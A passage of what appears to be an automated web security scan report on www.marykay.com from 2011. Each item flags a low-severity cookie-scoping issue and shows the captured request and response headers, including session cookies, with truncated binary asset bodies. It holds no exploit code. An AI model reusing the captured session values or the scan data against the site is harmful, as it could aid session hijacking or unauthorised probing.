12.75. http://www.marykay.com/Content/HPflash/254_makeUpArtistLooks.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/254_makeUpArtistLooks.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/254_makeUpArtistLooks.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=A54BE6714B423AFBADF1DD9C59C8A29F; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 47134
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:26 GMT
Accept-Ranges: bytes
ETag: "6318542b621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2FCCB00347201A4BA3241398CB9DCDDF; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:46:00 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:46:00 GMT; path=/

CWS.Z...x...u\T..7~.$.)....i..i....SdDAE:..n..TA..EiAD@EDx.........{.?..>w......k...k.....
.t..."p....... .J#2...[Z..K.P.:9:{..-.j[OOWAvv...6.n6.w.vN...v..v..VP............Z.
.A...........
.63w.....
...[SNIP]...

12.76. http://www.marykay.com/Content/HPflash/324m_shopYourWay.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/324m_shopYourWay.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/324m_shopYourWay.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 33387
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 01 Sep 2011 15:00:31 GMT
Accept-Ranges: bytes
ETag: "4a6ad5e4b768cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C7F280CB4F77F9D1ABACB09CB795199D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.....x....<........=2".....BB QQ..[.k6.^...%.B..l.R....-iP.E.^....................|..y....y..uC.] ...@J.......q``@..D.`. .|.....{1...yzy.@..p....-..x......8?......h..[....
..

..^..`.R...X...y....
...[SNIP]...

12.77. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/330m_%20FallTrend_eng.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/330m_%20FallTrend_eng.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 57149
Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 30 Aug 2011 17:20:26 GMT
Accept-Ranges: bytes
ETag: "1d37901b3967cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:55 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

CWS.,p..x..} <.[...}.N..."IQ.U(....PM..3.E ...J.vm....sK...fiOE...{...3..QM.{..........9....,.9..L0`j..:.(.. ....$wvv.SjH.$......6>*..:.......3.an.`.[...
.rC@.....n!............NP...D...m..6..F.<..7.
...[SNIP]...

12.78. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/373_TWNightCmpx.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/373_TWNightCmpx.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41595
Content-Type: application/x-shockwave-flash
Last-Modified: Wed, 20 Jul 2011 19:27:10 GMT
Accept-Ranges: bytes
ETag: "94cc2051347cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:57 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

CWS.....x...wXS..7...4A..i...;
....*.$Hob. ...U...A...HQ@....*
RU:..w'...y.u.......Fw.g.*3k.....A.P.F.x3......(.....'..3..N2.J*..n..>2`K.....SFP......E.<...
KKK.
........>..}m...}...Xq...}..Q..(.wVl..
...[SNIP]...

12.79. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/502_mascaraWardrobe.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/502_mascaraWardrobe.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=19C9D0014D75852EFB8C9087C106B6A5; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 72922
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:28 GMT
Accept-Ranges: bytes
ETag: "7387422c621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:55 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

CWS..F..x..z. ....{q.....D..n..do..{....Rv...eo..G({..QV(..."._...?.....9.y.9.y..y.sn0..\..=..yb@......s... .fi%zCF.......
.I0.xx..rqy{{sz.q:.Ys....pq.r..r.....N..>.N.L..0...............n~...C....X.G.
...[SNIP]...

12.80. http://www.marykay.com/Content/HPflash/502_moc.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/502_moc.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/502_moc.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 57038
Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 28 Jun 2011 20:41:18 GMT
Accept-Ranges: bytes
ETag: "3640a0bbd335cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:54 GMT; path=/

CWS..k..x....\SI...Oz.E. M....."E.D..".DJ....AE......WQ.7l.".T.
..b.X...Fi.mIn.jt.......].9g...S.L.7......D....+.......cFj"....(..f..%Q.H{..........C..wT ..a.#@....|.#.#6..;. ......(.....Ct..:.N...3..
...[SNIP]...

12.81. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Content/HPflash/BoaB_miniAd.swf

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Content/HPflash/BoaB_miniAd.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 27154
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 01 Sep 2011 11:38:38 GMT
Accept-Ranges: bytes
ETag: "823f5b19b68cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.0...x....\........!-%.
.(..R..(..JH,%...J.X. 6v+*"`..6v`..".` ..S..,..z..w....s..s..93'.L>.F..:..R..".*..?Kb__.9.........b.LI.a.l#}.....%2.7.... ..a..L...3../.....}.. ...gD...F|..R..T.3....}....e.
...[SNIP]...

12.82. http://www.marykay.com/IMAGES/bkgLong.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/IMAGES/bkgLong.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /IMAGES/bkgLong.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1942
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:18:22 GMT
Accept-Ranges: bytes
ETag: "4fd9e5621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

GIF89a.......B<:>87JDC60/HBAD><2,+F@>:43@:9<65XRP8214.-4.,;54710?982,*822C=<WQPGA?@::1+*SMLKEC=66OIHXQO3-,932810XQPYRQ5/.D?>LEDF?>E@><55A;:PIG@98VPNWQOUOMSMKMGEOIGTNLRLJQKIPJHNHFICALFDNGFTNMSLKVPOPJIV
...[SNIP]...

12.83. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Checkout/viewbag/btn_x.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Checkout/viewbag/btn_x.png HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 695
Content-Type: image/png
Last-Modified: Thu, 02 Jun 2011 09:23:29 GMT
Accept-Ranges: bytes
ETag: "77524cbc621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...YIDATx...Kk.Q.....<.......2A.J....Tpa.FS....r......"....,.nJ.L........L.....g:. x.r/w...s.....0.[..;....>l..{.$!.T*.l6.\......
...[SNIP]...

12.84. http://www.marykay.com/Images/Site/FooterBack1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/FooterBack1.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/FooterBack1.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1466
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "ebcd3647621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

GIF89a..'...............................................................................................................................................................................................
...[SNIP]...

12.85. http://www.marykay.com/Images/Site/hdottedline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/hdottedline.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/hdottedline.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 809
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "b3923b47621cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:51 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

12.86. http://www.marykay.com/Images/Site/searchbox.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/searchbox.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/searchbox.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 952
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "17f53d47621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

GIF89a.......xKKlCB|OLqFEb=<Z87f?>sHEwKIoFD|MKzKK\:7|ON^;;oFEfA>^;9wJI\87lEBhC@jCB|OKb?<wKKuJG.ONzMKb=;`;;~ONsFEsHG`=;|MLZ:7|KKsJGd?>mFDmEB\;9.POb;;d?<jC@qHE\:9.PNhC>wJGxMK\;7hA@~OLoFB^:9xKIoEBmCBf?<m
...[SNIP]...

12.87. http://www.marykay.com/Images/Site/vdottedline.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/vdottedline.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/vdottedline.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 809
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "a77e4747621cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:51 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

12.88. http://www.marykay.com/Images/Site/wholeheader.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/Images/Site/wholeheader.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Images/Site/wholeheader.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 13033
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "be14947621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

..........................................................................................................u....
...[SNIP]...

12.89. http://www.marykay.com/JS/swfobject.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.marykay.com
Path:	/JS/swfobject.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com

